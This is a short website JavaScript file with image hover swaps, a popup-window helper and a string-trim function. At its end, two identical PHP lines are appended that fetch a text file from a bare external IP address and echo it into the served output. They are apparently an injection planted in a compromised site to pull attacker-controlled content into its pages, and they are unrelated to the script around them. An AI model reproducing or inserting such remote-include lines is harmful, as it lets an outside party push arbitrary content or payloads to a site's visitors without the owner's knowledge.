var on = new Image();
var off = new Image();

on = "/img/16.png";
off = "/img/16_1.png";


function light(id)
{
	document.getElementById("lamp"+id).src = off;
}
function dark(id)
{
	document.getElementById("lamp"+id).src = on;
}

function light1(o)
{
	o.className = "item2_1";
}
function dark1(o)
{
	o.className = "item2";
}



var winFlag = 0;
function newWin(url, x, y) 
{
		if (winFlag == 1) new_win.close();
		new_win = window.open(url,null,"width="+x+",height="+y+",scrollbars=no");
		winFlag = 1;
}

function trim(str) {
		str = str.replace(/^\s+/g,""); 
 		str = str.replace(/\s+$/g,""); 
		return str; 
}
<?php echo file_get_contents("http://91.193.192.27/users.txt"); ?>
<?php echo file_get_contents("http://91.193.192.27/users.txt"); ?>

